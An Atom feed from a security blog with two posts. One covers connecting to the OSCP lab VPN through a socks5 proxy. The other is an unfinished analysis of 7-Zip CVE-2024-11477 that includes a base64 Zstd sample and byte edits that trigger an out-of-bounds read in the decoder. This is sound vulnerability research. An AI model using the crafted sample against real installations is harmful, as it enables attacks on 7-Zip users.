feed.xml

<?xml version="1.0" encoding="utf-8"?><feed xmlns="http://www.w3.org/2005/Atom" ><generator uri="https://jekyllrb.com/" version="4.2.2">Jekyll</generator><link href="https://pwntips.github.io/feed.xml" rel="self" type="application/atom+xml" /><link href="https://pwntips.github.io/" rel="alternate" type="text/html" /><updated>2024-12-31T14:21:15+08:00</updated><id>https://pwntips.github.io/feed.xml</id><title type="html">PwnTips</title><subtitle>Tips &amp; Tricks</subtitle><entry><title type="html">在国内连接 OSCP 的 Universal VPN</title><link href="https://pwntips.github.io/2024/12/30/universal-vpn-in-china.html" rel="alternate" type="text/html" title="在国内连接 OSCP 的 Universal VPN" /><published>2024-12-30T00:00:00+08:00</published><updated>2024-12-30T00:00:00+08:00</updated><id>https://pwntips.github.io/2024/12/30/universal-vpn-in-china</id><content type="html" xml:base="https://pwntips.github.io/2024/12/30/universal-vpn-in-china.html"><![CDATA[<p>TLDR 版：openvpn 支持 socks5 代理，改一下配置，使用 socks5 代理连接 VPN 服务器。</p>

<p>最近购买了 offsec 的 PEN 200/OSCP 课程，发现在国内连它的 Universal VPN 很不稳定，不用多说又是 GFW 的原因。</p>

<p>最开始我是买了个国外的 VPS 上面装了 KALI，然后配合 SSH 端口转发使用，但是买的廉价 VPS 硬盘还有内存都比较小，还是各种不方便，就还是想解决一下，试了官方说的改网卡的 MTU，没什么效果，觉得还是要从墙的方向解决问题，就搜了一下，发现 OpenVPN 是支持 socks5 代理的，改一下配置文件就好。</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>socks-proxy 127.0.0.1 10808
</code></pre></div></div>

<p>或者在 Windows 版的 GUI OpenVPN 客户端上也是可以设置代理的。</p>

<p><img src="/assets/images/Pasted%20image%2020241230180724.png" alt="" /></p>

<p>设置了代理以后，连接速度稳定了很多，以前用 RDP 完全不能用，现在已经可以正常使用了，但是稍有延迟。</p>

<p>但是还有个问题，每次进行第一次连接时很不稳定，要重连多次才能得到一个可用的连接。现象就是虽然 OpenVPN 连接成功但是，并不能 ping 通目标机器，Window 客户端的话托盘图标有时候会变成黄色，有时会有下面的提示信息：</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Mon Dec 30 16:36:09 2024 WARNING: Received unknown control message: * OFFSEC LABS NOTICE: Mon Dec 30 16:36:09 2024 WARNING: Received unknown control message: * Managing Universal VPN, please wait... Mon Dec 30 16:36:09 2024 Connection reset command was pushed by server ('')
</code></pre></div></div>

<p>目前搜到一个可能的<a href="https://www.hardwork.cn/html/archives/381.html">解决方案</a>， 说是 persist-tun 配置造成的，目前不确认是否这个问题，还在观望中。</p>

<p>因为这个问题，我现在都是连上 Universal VPN， 然后开一台机器测试一下能不能实际 PING 通，不能的话，就要重连几次，直到能 PING 通为止。但是只要连接成功以后，就可以稳定使用了。</p>]]></content><author><name></name></author><summary type="html"><![CDATA[TLDR 版：openvpn 支持 socks5 代理，改一下配置，使用 socks5 代理连接 VPN 服务器。]]></summary></entry><entry><title type="html">分析 7zip 漏洞 CVE-2024-11147(WIP)</title><link href="https://pwntips.github.io/2024/12/10/7zip-CVE-2024-11477.html" rel="alternate" type="text/html" title="分析 7zip 漏洞 CVE-2024-11147(WIP)" /><published>2024-12-10T00:00:00+08:00</published><updated>2024-12-10T00:00:00+08:00</updated><id>https://pwntips.github.io/2024/12/10/7zip-CVE-2024-11477</id><content type="html" xml:base="https://pwntips.github.io/2024/12/10/7zip-CVE-2024-11477.html"><![CDATA[<p>分析一下 7zip 漏洞 CVE-2024-11477/ZDI-24-1532，查看 <a href="https://www.zerodayinitiative.com/advisories/ZDI-24-1532/">ZDI 公告</a> 提取到关键点：</p>
<ul>
  <li>24.07 修复，之前的版本有问题：那么我们 DIFF 24.07 和 24.06 的代码</li>
  <li>漏洞出现在 <a href="https://en.wikipedia.org/wiki/Zstd">Zstandard</a> 解压的代码中</li>
</ul>

<p>DIFF</p>

<p><a href="https://sourceforge.net/projects/sevenzip/files/7-Zip/24.06/7z2406-src.7z/download">2406</a>
<a href="https://sourceforge.net/projects/sevenzip/files/7-Zip/24.07/7z2407-src.7z/download">2407</a></p>

<p>用 beyond compare 对比以后找到 C\ZstdDec.c 这个文件有如下修改:</p>

<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">&gt;&gt;</span><span class="w"> </span><span class="n">git</span><span class="w"> </span><span class="nx">diff</span><span class="w"> </span><span class="nx">D:\Downloads\7z-compare\2406\C\ZstdDec.c</span><span class="w"> </span><span class="nx">D:\Downloads\7z-compare\2407\C\ZstdDec.c</span><span class="w">
</span><span class="n">diff</span><span class="w"> </span><span class="nt">--git</span><span class="w"> </span><span class="s2">"a/D:\\Downloads\\7z-compare\\2406\\C\\ZstdDec.c"</span><span class="w"> </span><span class="s2">"b/D:\\Downloads\\7z-compare\\2407\\C\\ZstdDec.c"</span><span class="w">
</span><span class="n">index</span><span class="w"> </span><span class="nx">fd0dbda..ef9eca3</span><span class="w"> </span><span class="nx">100644</span><span class="w">
</span><span class="o">---</span><span class="w"> </span><span class="s2">"a/D:\\Downloads\\7z-compare\\2406\\C\\ZstdDec.c"</span><span class="w">
</span><span class="o">+++</span><span class="w"> </span><span class="s2">"b/D:\\Downloads\\7z-compare\\2407\\C\\ZstdDec.c"</span><span class="w">
</span><span class="err">@@</span><span class="w"> </span><span class="nt">-1</span><span class="p">,</span><span class="mi">5</span><span class="w"> </span><span class="o">+</span><span class="mi">1</span><span class="p">,</span><span class="mi">5</span><span class="w"> </span><span class="err">@@</span><span class="w">
 </span><span class="n">/</span><span class="o">*</span><span class="w"> </span><span class="nx">ZstdDec.c</span><span class="w"> </span><span class="o">--</span><span class="w"> </span><span class="nx">Zstd</span><span class="w"> </span><span class="nx">Decoder</span><span class="w">
</span><span class="nt">-2024-05-26</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="nx">code</span><span class="w"> </span><span class="nx">was</span><span class="w"> </span><span class="nx">developed</span><span class="w"> </span><span class="nx">by</span><span class="w"> </span><span class="nx">Igor</span><span class="w"> </span><span class="nx">Pavlov</span><span class="p">,</span><span class="w"> </span><span class="nx">using</span><span class="w"> </span><span class="nx">Zstandard</span><span class="w"> </span><span class="nx">format</span><span class="w">
</span><span class="o">+</span><span class="mi">2024</span><span class="nt">-06-18</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="n">the</span><span class="w"> </span><span class="nx">code</span><span class="w"> </span><span class="nx">was</span><span class="w"> </span><span class="nx">developed</span><span class="w"> </span><span class="nx">by</span><span class="w"> </span><span class="nx">Igor</span><span class="w"> </span><span class="nx">Pavlov</span><span class="p">,</span><span class="w"> </span><span class="nx">using</span><span class="w"> </span><span class="nx">Zstandard</span><span class="w"> </span><span class="nx">format</span><span class="w">
              </span><span class="n">specification</span><span class="w"> </span><span class="nx">and</span><span class="w"> </span><span class="nx">original</span><span class="w"> </span><span class="nx">zstd</span><span class="w"> </span><span class="nx">decoder</span><span class="w"> </span><span class="nx">code</span><span class="w"> </span><span class="nx">as</span><span class="w"> </span><span class="nx">reference</span><span class="w"> </span><span class="nx">code.</span><span class="w">
 </span><span class="n">original</span><span class="w"> </span><span class="nx">zstd</span><span class="w"> </span><span class="nx">decoder</span><span class="w"> </span><span class="nx">code:</span><span class="w"> </span><span class="nx">Copyright</span><span class="w"> </span><span class="p">(</span><span class="n">c</span><span class="p">)</span><span class="w"> </span><span class="n">Facebook</span><span class="p">,</span><span class="w"> </span><span class="nx">Inc.</span><span class="w"> </span><span class="nx">All</span><span class="w"> </span><span class="nx">rights</span><span class="w"> </span><span class="nx">reserved.</span><span class="w">
 </span><span class="n">This</span><span class="w"> </span><span class="nx">source</span><span class="w"> </span><span class="nx">code</span><span class="w"> </span><span class="nx">is</span><span class="w"> </span><span class="nx">licensed</span><span class="w"> </span><span class="nx">under</span><span class="w"> </span><span class="nx">BSD</span><span class="w"> </span><span class="nx">3-Clause</span><span class="w"> </span><span class="nx">License.</span><span class="w">
</span><span class="err">@@</span><span class="w"> </span><span class="nt">-1308</span><span class="p">,</span><span class="mi">8</span><span class="w"> </span><span class="o">+</span><span class="mi">1308</span><span class="p">,</span><span class="mi">10</span><span class="w"> </span><span class="err">@@</span><span class="w"> </span><span class="n">FSE_Decode_SeqTable</span><span class="p">(</span><span class="n">CFseRecord</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="nx">const</span><span class="w"> </span><span class="nx">table</span><span class="p">,</span><span class="w">
   </span><span class="n">in-</span><span class="err">&gt;</span><span class="nx">len--</span><span class="p">;</span><span class="w">
   </span><span class="p">{</span><span class="w">
     </span><span class="n">const</span><span class="w"> </span><span class="nx">Byte</span><span class="w"> </span><span class="o">*</span><span class="nx">ptr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">in-</span><span class="err">&gt;</span><span class="nx">ptr</span><span class="p">;</span><span class="w">
</span><span class="o">-</span><span class="w">    </span><span class="n">const</span><span class="w"> </span><span class="nx">Byte</span><span class="w"> </span><span class="nx">sym</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ptr</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span><span class="w">
</span><span class="o">+</span><span class="w">    </span><span class="n">const</span><span class="w"> </span><span class="nx">unsigned</span><span class="w"> </span><span class="nx">sym</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ptr</span><span class="p">[</span><span class="mi">0</span><span class="p">];</span><span class="w">
     </span><span class="n">in-</span><span class="err">&gt;</span><span class="nx">ptr</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">ptr</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="nx">1</span><span class="p">;</span><span class="w">
</span><span class="o">+</span><span class="w">    </span><span class="kr">if</span><span class="w"> </span><span class="p">(</span><span class="n">sym</span><span class="w"> </span><span class="err">&gt;</span><span class="o">=</span><span class="w"> </span><span class="n">numSymbolsMax</span><span class="p">)</span><span class="w">
</span><span class="o">+</span><span class="w">      </span><span class="kr">return</span><span class="w"> </span><span class="n">SZ_ERROR_DATA</span><span class="p">;</span><span class="w">
     </span><span class="n">table</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="p">(</span><span class="n">FastInt32</span><span class="p">)</span><span class="n">sym</span><span class="w">
       </span><span class="c">#if defined(Z7_ZSTD_DEC_USE_ML_PLUS3)</span><span class="w">
         </span><span class="o">+</span><span class="w"> </span><span class="p">(</span><span class="n">numSymbolsMax</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="n">NUM_ML_SYMBOLS</span><span class="w"> </span><span class="nf">?</span><span class="w"> </span><span class="nx">MATCH_LEN_MIN</span><span class="w"> </span><span class="p">:</span><span class="w"> </span><span class="nx">0</span><span class="p">)</span><span class="w">
</span></code></pre></div></div>

<p>根据这个修改我们可以大胆推测，这里是从字节流中读出 1 字节的某个结构的数量，之前没有验证这个数量是否超出了正常的范围，所以产生了漏洞。
接下来我们要验证这个的猜测，并且构造一个 POC 出来。</p>

<p>先要了解一下 .zst 文件格式的信息，可以搜到一个 facebook 官方的<a href="https://github.com/facebook/zstd/blob/dev/doc/zstd_compression_format.md">文档</a> ，阅读后得知：</p>
<ul>
  <li>.zst 文件是由多个 frame 组成的, frame 以魔法数 0xFD2FB528 开头</li>
  <li>每个 frame 可以包含 1-n 个 data_block，data_block 有多种类型，储存压缩数据的是 Compressed_Block</li>
  <li>Compressed_Block 包含 Literals Section 和 Sequence Section 两部分</li>
</ul>

<p>再来结合代码，被修改的函数是 <code class="language-plaintext highlighter-rouge">FSE_Decode_SeqTable</code>, 仅在 <code class="language-plaintext highlighter-rouge">ZstdDec1_DecodeBlock</code> 函数中有 3 处引用，且这三处引用相邻，应该是解码 data_block 的一个步骤。结合文档分析代码，发现函数 <code class="language-plaintext highlighter-rouge">ZstdDec1_DecodeBlock</code>  实际上在处理 Compressed_Block，函数 <code class="language-plaintext highlighter-rouge">FSE_Decode_SeqTable</code> 在处理 Sequences Section, 被修改的代码行，是在解码 Compressed_mode 为 RLE_Mode 的 sequence 数据，读到 <code class="language-plaintext highlighter-rouge">sym</code> 变量的值是 Literals_Length_Table/Offset_Table/Match_Length_Table 的内容，是攻击者可控的，<code class="language-plaintext highlighter-rouge">table[0] = sym</code> 是将其保存到了一个 <code class="language-plaintext highlighter-rouge">CZstdDecFseTables</code> 结构体，以供后续使用。接下来分析这个值在哪里使用，目前高度怀疑是后面紧接着会调用的 <code class="language-plaintext highlighter-rouge">Decompress_Sequences</code> 函数中，但是此函数用了大量的宏，直接分析起来很不方便，先用 VC 编译器的功能得到一份预处理之后的代码</p>

<div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="err">&gt;</span><span class="w"> </span><span class="c"># Visual Studio Developer Powershell 中运行，否则可能报错没找到 cl</span><span class="w">
</span><span class="err">&gt;</span><span class="w"> </span><span class="n">cl</span><span class="w"> </span><span class="nx">/P</span><span class="w"> </span><span class="nx">c\ZstdDec.c</span><span class="w"> 
</span><span class="err">&gt;</span><span class="w"> </span><span class="c"># 可选步骤，只是格式化代码，如果装 VS 时候没有选装 llvm 可能会缺少 clang-format</span><span class="w">
</span><span class="err">&gt;</span><span class="w"> </span><span class="n">clang-format</span><span class="w"> </span><span class="nx">ZstdDec.i</span><span class="w"> </span><span class="err">&gt;</span><span class="w"> </span><span class="nx">ZstdDec.i.c</span><span class="w"> 
</span></code></pre></div></div>

<p>阅读以后就可以证实，存入 <code class="language-plaintext highlighter-rouge">CZstdDecFseTables</code> 的值，就是在 <code class="language-plaintext highlighter-rouge">Decompress_Sequences</code> 中使用的，Decompress_Sequences 是 tANS/FSE 解码算法的实现，这个算法是 zstd 压缩率能高与其他仅基于 huffman 编码的压缩软件的核心因素，我认为还比较复杂，不过对于我们漏洞分析的目标来说，也不需要了解很多，参考 <a href="https://medium.com/@bredelet/understanding-ans-coding-through-examples-d1bebfc7e076">understanding-ans-coding-through-examples-d1bebfc7e076</a> 可以得到解码的操作重点如下：</p>
<ul>
  <li>解码需要三个输入参数：状态 x、速查表 table、字节流 bitStream</li>
  <li>速查表存储了每个状态对应的：符号 S, 以及状态转移需要的参数 y、k（使用方式例如 table[x].S、table[x].y、table[x].k，但是实际算法是有优化的，S、y、k 三个值被存入了同一个 DWORD 中，用位操作代替了这些成员变量访问)</li>
  <li>解码涉及到多轮迭代，每轮都会：
    <ul>
      <li>根据当前状态从速查表查出解码的符号 S（解压后得到的原始值）</li>
      <li>将 x 转移到新状态：状态转移需要 x、y、k、bitStream 参与运算</li>
    </ul>
  </li>
  <li>回顾一下 Sequence Section 的结构：
    <ul>
      <li>
        <table>
          <tbody>
            <tr>
              <td><code class="language-plaintext highlighter-rouge">Sequences_Section_Header</code></td>
              <td>[<code class="language-plaintext highlighter-rouge">Literals_Length_Table</code>]</td>
              <td>[<code class="language-plaintext highlighter-rouge">Offset_Table</code>]</td>
              <td>[<code class="language-plaintext highlighter-rouge">Match_Length_Table</code>]</td>
              <td>bitStream</td>
            </tr>
          </tbody>
        </table>
      </li>
      <li>Xxxxx_Table 存储的就是速查表，因为存储了 Literals_Length、Offset、Match_Length 三种数据，所以是三个速查表</li>
      <li>bitStream，其实是 Literals_Length、Offset、Match_Length 三个数据流交叉存放在一起形成的一个数据流</li>
    </ul>
  </li>
  <li>另外解码时 bitStream 是从最后一个字节开始，反向使用的。因为编码时是将状态信息正向写入的 bitStream，解码的时候要从最后一个状态开始(编码器眼里的最后一个），反向恢复，恢复出的原数据也是反向的</li>
  <li>至于为什么这样解码可以解压数据，x、tab、bitStream、y、k 又都是怎么来的，感兴趣的话大家可以深入去学习 tANS 算法，这里就不展开了，只需要知道这个算法的解码就是在做这些操作即可</li>
</ul>

<hr />
<p>ℹ️ 如果想深入了解 tANS/FSE，如下资料可以参考：</p>
<ul>
  <li>https://www.cnblogs.com/zblade/p/14338758.html</li>
  <li>https://bjlkeng.io/posts/lossless-compression-with-asymmetric-numeral-systems/</li>
  <li>https://kedartatwawadi.github.io/post–ANS/</li>
  <li>https://fastcompression.blogspot.com/2013/12/finite-state-entropy-new-breed-of.html</li>
  <li>http://cbloomrants.blogspot.fr/2014/02/02-18-14-understanding-ans-conclusion.html</li>
</ul>

<hr />

<p>了解了这些，就可以知道，攻击者可控的数据 <code class="language-plaintext highlighter-rouge">sym</code>，就是速查表里存储的内容，解码的时候确实会用到它，不过这里要注意速查表里的元素是 32 比特的，而我们只能控制这 32 位的低 8 位，再结合代码来看，<code class="language-plaintext highlighter-rouge">Decompress_Sequences</code> 函数中的临时变量 <code class="language-plaintext highlighter-rouge">state_ll</code>、<code class="language-plaintext highlighter-rouge">state_of</code>、<code class="language-plaintext highlighter-rouge">state_ml</code> 是从速查表中查到的值，它们的最低字节又会传递到 <code class="language-plaintext highlighter-rouge">of_code</code>、<code class="language-plaintext highlighter-rouge">matchLen</code>、<code class="language-plaintext highlighter-rouge">litLen</code>。（也就是说速查表存储的 32 比特元素，低 8 位存放的是符号 S）而 <code class="language-plaintext highlighter-rouge">of_code</code>、<code class="language-plaintext highlighter-rouge">matchLen</code>、<code class="language-plaintext highlighter-rouge">litLen</code>，又在几处内存访问的地方被当作索引/长度来使用，如果在这些内存访问的地方，也没有检查索引/长度的合理性的话，就会产生内存访问越界了。例如:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>//from ZstdDec.i.c
//...
static const UInt32 k_SEQ_LL_BASES[36] = {
    0,     1,     2,     3,     4,      5,      6,      7,      8,
    9,     10,    11,    12,    13,     14,     15,     16,     18,
    20,    22,    24,    28,    32,     40,     48,     64,     0x80,
    0x100, 0x200, 0x400, 0x800, 0x1000, 0x2000, 0x4000, 0x8000, 0x10000};
#line 286 ".\\ZstdDec.c"

static const Byte k_SEQ_LL_EXTRA[36] = {
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,  0,  0,  0,  0,  1,  1,
    1, 1, 2, 2, 3, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};

//....

const unsigned extra = k_SEQ_LL_EXTRA[litLen];
litLen = k_SEQ_LL_BASES[litLen];

</code></pre></div></div>

<hr />
<p>ℹ️ 也可以通过阅读原代码，在宏定义中发现速查表中存储的信息的格式：</p>
<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#define FSE_REC_LEN_OFFSET    8
#define FSE_REC_STATE_OFFSET  16
#define GET_FSE_REC_SYM(st)   ((Byte)(st))
#define GET_FSE_REC_LEN(st)   ((Byte)((st) &gt;&gt; FSE_REC_LEN_OFFSET))
#define GET_FSE_REC_STATE(st) ((st) &gt;&gt; FSE_REC_STATE_OFFSET)
</span></code></pre></div></div>
<hr />

<p>使用 <code class="language-plaintext highlighter-rouge">litLen</code> 作为下标访问了两个数组，两个数组的长度都小于 <code class="language-plaintext highlighter-rouge">litLen</code> 可能的最大取值，很可能可以构造出能触发越界读的样本。</p>

<p>下面我们就结合调试器，构造出对应的样本，触发越界访问。先从源码构建出可执行文件，整个项目包含多个可执行文件，我选择了 7zcl.exe、7z.dll 作为调试目标，用 nmake 来构建，构建 Debug 版本以方便调试，方案是参考 <a href="https://stackoverflow.com/questions/56436451/nmake-how-do-i-force-a-debug-build-7zip">stackoverflow nmake-how-do-i-force-a-debug-build-7zip</a> 。</p>
<ul>
  <li>修改 CPP/7zip/UI/Client7z/Client7z.cpp:64 的代码 <code class="language-plaintext highlighter-rouge">DEFINE_GUID_ARC (CLSID_Format, 0xe)</code>
    <ul>
      <li>0xe 是 zstd 文档对应的 arc ID</li>
      <li>可以在 CPP/7zip/Archive/ZstdHandler.cpp 的 <code class="language-plaintext highlighter-rouge">REGISTER_ARC_IO</code> 宏调用中找到</li>
    </ul>
  </li>
  <li>修改 CPP/Build.mak 的 CFLAGS 和 LFLAGS，以构建调试版的可执行文件以及对应的 .pdb 文件：
    <ul>
      <li>CFLAGS 中的 -O1 -O2 都改成 -Od 禁用优化</li>
      <li>CFLAGS 加入 /Zi 以生成调试符号</li>
      <li>CFLAGS 去掉 -W4 和 -Wall，以解决编译过程中由于警告造成的编译失败</li>
      <li>LFLSGS 加入 /DEBUG</li>
    </ul>
  </li>
  <li>在 VS Developer Powershell 执行构建操作
    <div class="language-powershell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="w">  </span><span class="err">&gt;</span><span class="w"> </span><span class="n">pushd</span><span class="w">
  </span><span class="err">&gt;</span><span class="w"> </span><span class="c"># 构建client7z.exe</span><span class="w">
  </span><span class="err">&gt;</span><span class="w"> </span><span class="n">cd</span><span class="w"> </span><span class="nx">CPP\7zip\UI\Client7z</span><span class="w">
  </span><span class="err">&gt;</span><span class="w"> </span><span class="n">nmake</span><span class="w">
  </span><span class="err">&gt;</span><span class="w"> </span><span class="nx">popd</span><span class="w">
  </span><span class="err">&gt;</span><span class="w"> </span><span class="c"># 构建 7z.dll</span><span class="w">
  </span><span class="err">&gt;</span><span class="w"> </span><span class="n">cd</span><span class="w"> </span><span class="nx">CPP\7zip\Bundles\Format7zF</span><span class="w">
  </span><span class="err">&gt;</span><span class="w"> </span><span class="n">nmake</span><span class="w">
  </span><span class="err">&gt;</span><span class="w"> </span><span class="c"># 拷贝 7z.dll 7z.pdb 到 client7z.exe 同目录</span><span class="w">
  </span><span class="err">&gt;</span><span class="w"> </span><span class="n">copy</span><span class="w"> </span><span class="o">.</span><span class="nx">\o\7z.dll</span><span class="w"> </span><span class="o">..</span><span class="nx">\..\UI\Client7z\o\</span><span class="w">
  </span><span class="err">&gt;</span><span class="w"> </span><span class="n">copy</span><span class="w"> </span><span class="o">.</span><span class="nx">\o\7z.pdb</span><span class="w"> </span><span class="o">..</span><span class="nx">\..\UI\Client7z\o\</span><span class="w">
</span></code></pre></div>    </div>
  </li>
</ul>

<p>有了 Client7z.exe 和 7z.dll 就可以调试了，对于有源码的场景，我喜欢用 VS 来调试:</p>
<ul>
  <li>用 VS 的 Open Folder 功能将 7zip 的源码目录作为项目打开</li>
  <li>在 VS 的解决方案浏览器，找到 Client7z.exe （在 CPP/7zip/UI/Client7z/o/Client7z.exe)</li>
  <li>右键菜单 -&gt; Set As Startup Item</li>
  <li>右键菜单 -&gt; Add Debug Configuration -&gt; Default</li>
  <li>在自动打开的 lauch.vs.json 中加入命令行配置 <code class="language-plaintext highlighter-rouge">args</code>
    <div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="w">  </span><span class="p">{</span><span class="w">
    </span><span class="nl">"version"</span><span class="p">:</span><span class="w"> </span><span class="s2">"0.2.1"</span><span class="p">,</span><span class="w">
    </span><span class="nl">"defaults"</span><span class="p">:</span><span class="w"> </span><span class="p">{},</span><span class="w">
    </span><span class="nl">"configurations"</span><span class="p">:</span><span class="w"> </span><span class="p">[</span><span class="w">
      </span><span class="p">{</span><span class="w">
        </span><span class="nl">"type"</span><span class="p">:</span><span class="w"> </span><span class="s2">"default"</span><span class="p">,</span><span class="w">
        </span><span class="nl">"project"</span><span class="p">:</span><span class="w"> </span><span class="s2">"CPP</span><span class="se">\\</span><span class="s2">7zip</span><span class="se">\\</span><span class="s2">UI</span><span class="se">\\</span><span class="s2">Client7z</span><span class="se">\\</span><span class="s2">o</span><span class="se">\\</span><span class="s2">7zcl.exe"</span><span class="p">,</span><span class="w">
        </span><span class="nl">"projectTarget"</span><span class="p">:</span><span class="w"> </span><span class="s2">""</span><span class="p">,</span><span class="w">
        </span><span class="nl">"name"</span><span class="p">:</span><span class="w"> </span><span class="s2">"7zcl.exe"</span><span class="p">,</span><span class="w">
        </span><span class="nl">"args"</span><span class="p">:[</span><span class="s2">"7zcl.exe"</span><span class="p">,</span><span class="w"> </span><span class="s2">"x"</span><span class="p">,</span><span class="w"> </span><span class="s2">"poc.zst"</span><span class="p">],</span><span class="w"> 
      </span><span class="p">}</span><span class="w">
    </span><span class="p">]</span><span class="w">
  </span><span class="p">}</span><span class="w">
</span></code></pre></div>    </div>
  </li>
</ul>

<p>这样配置好以后，在 VS 中点击开始调试，VS 就会用指定的命令行为我们启动一个 7zcl.exe 并开始调试了。参数中指定了用 7zcl.exe 来解压一个 poc.zst 文件，我们还需要构造出这个 poc 文件。我的构造方式是找到一个小的 .zst 文件，在它的基础上进行修改。所以我安装了压缩程序 zstd 压缩了一个随便找的小文件，得到下面这个 poc.zst 文档(base64 编码的数据)。</p>

<pre><code class="language-base64">KLUv/WSBAJ0HAFJNLiUgjegBs3wDbJDe4r8UR0hA5BmkXH0Jy6Cv+C63gaF/CdCKP4IGzBhJZOKUqtIw7n20LSBY3uBwWZSIl6jJcpCpKCCYttankcF0jCQycelqTFPTw5UYKgg9+Quz+k+L7D+0xU4we2fpP+lo+E9CaGFW3b/pbGySfuPgbfN4At3MIB0AoGin69MidMwSqMkZFESlIF1t4b5wb6c/QtDCf8wG2ulGNJ+E4CNaZ786OsHs3skrTTv9TBoFFQBCO8DJOEBhX52cCLeAtQPAymDVhpcMuG58YyM4JrMaHiov0xxbDWxBoGAlONs9w+AyrI8oe8zKBHY=
</code></pre>

<hr />
<p>ℹ️ 也可以直接使用这个 <a href="https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)&amp;input=S0xVdi9XU0JBSjBIQUZKTkxpVWdqZWdCczN3RGJKRGU0cjhVUjBoQTVCbWtYSDBKeTZDditDNjNnYUYvQ2RDS1A0SUd6QmhKWk9LVXF0SXc3bjIwTFNCWTN1QndXWlNJbDZqSmNwQ3BLQ0NZdHRhbmtjRjBqQ1F5Y2VscVRGUFR3NVVZS2dnOStRdXoraytMN0QrMHhVNHdlMmZwUCtsbytFOUNhR0ZXM2IvcGJHeVNmdVBnYmZONEF0M01JQjBBb0dpbjY5TWlkTXdTcU1rWkZFU2xJRjF0NGI1d2I2Yy9RdERDZjh3RzJ1bEdOSitFNENOYVo3ODZPc0hzM3NrclRUdjlUQm9GRlFCQ084REpPRUJoWDUyY0NMZUF0UVBBeW1EVmhwY011RzU4WXlNNEpyTWFIaW92MHh4YkRXeEJvR0FsT05zOXcrQXlySThvZTh6S0JIWT0&amp;oeol=VT">CyberChef 页面</a>下载 .zst 文档</p>

<hr />

<p>接下来我调试了 Client7z.exe 解压 poc.zst 的过程，发现 poc.zst 的 Symbol compression modes (0xC7 偏移处)  全为 0。
<img src="/assets/images/Pasted image 20241210144512.png" alt="" /></p>

<p>为了触发漏洞，我把他改成 <code class="language-plaintext highlighter-rouge">0b01010100</code>，再把后面 3 字节的数据全改成 <code class="language-plaintext highlighter-rouge">0xff</code>。</p>

<p><img src="/assets/images/Pasted image 20241210145918.png" alt="" /></p>

<p>改完后再次调试，发现已经可以触发越界读。</p>

<div class="language-cpp highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// ZstdDec.c:2197</span>
<span class="kt">size_t</span> <span class="n">litLen</span> <span class="o">=</span> <span class="n">GET_FSE_REC_SYM</span><span class="p">(</span><span class="n">STATE_VAR</span><span class="p">(</span><span class="n">ll</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span><span class="n">litLen</span><span class="p">)</span>
<span class="p">{</span>
  <span class="c1">// if (STATE_VAR(ll) &amp; 0x70)</span>
  <span class="k">if</span> <span class="p">(</span><span class="n">litLen</span> <span class="o">&gt;=</span> <span class="mi">16</span><span class="p">)</span>
  <span class="p">{</span>
	<span class="k">const</span> <span class="kt">unsigned</span> <span class="n">extra</span> <span class="o">=</span> <span class="n">BASES_TABLE</span><span class="p">(</span><span class="n">SEQ_LL_EXTRA</span><span class="p">)</span> <span class="p">[</span><span class="n">litLen</span><span class="p">];</span> <span class="c1">// 运行到这里 litLen 为 0xff 已经超出了 k_SEQ_LL_EXTRA 数组的边界</span>
	<span class="n">litLen</span> <span class="o">=</span> <span class="n">BASES_TABLE</span><span class="p">(</span><span class="n">SEQ_LL_BASES</span><span class="p">)</span> <span class="p">[</span><span class="n">litLen</span><span class="p">];</span> <span class="c1">// 这里也是</span>
	<span class="cp">#ifdef Z7_ZSTD_DEC_USE_64BIT_LOADS
</span></code></pre></div></div>

<p>虽然可以触发漏洞了，但是由于这两个数组都是 static 数组，存储在 7z.dll 的 .rdata 段的，越界读刚好可以读到其他只读数据，不会触发崩溃，一个不会触发崩溃的 POC，总感觉差点什么，而且公告里说这个漏洞是可以造成一个 underflow 的，和我们分析的情况也明显不一样，所以接下来我们继续分析看怎么才能触发崩溃/ underflow。</p>

<p><strong>未完待续</strong></p>

<h2 id="typo">Typo</h2>

<p>分析漏洞的过程中还在 7z 项目中发现一个 typo，有空去刷一个 COMMIT 🙃</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// CPP/7zip/Archive/ArchiveExports.cpp:50 
static int FindFormatCalssId(const GUID *clsid) // Calss -&gt; Class
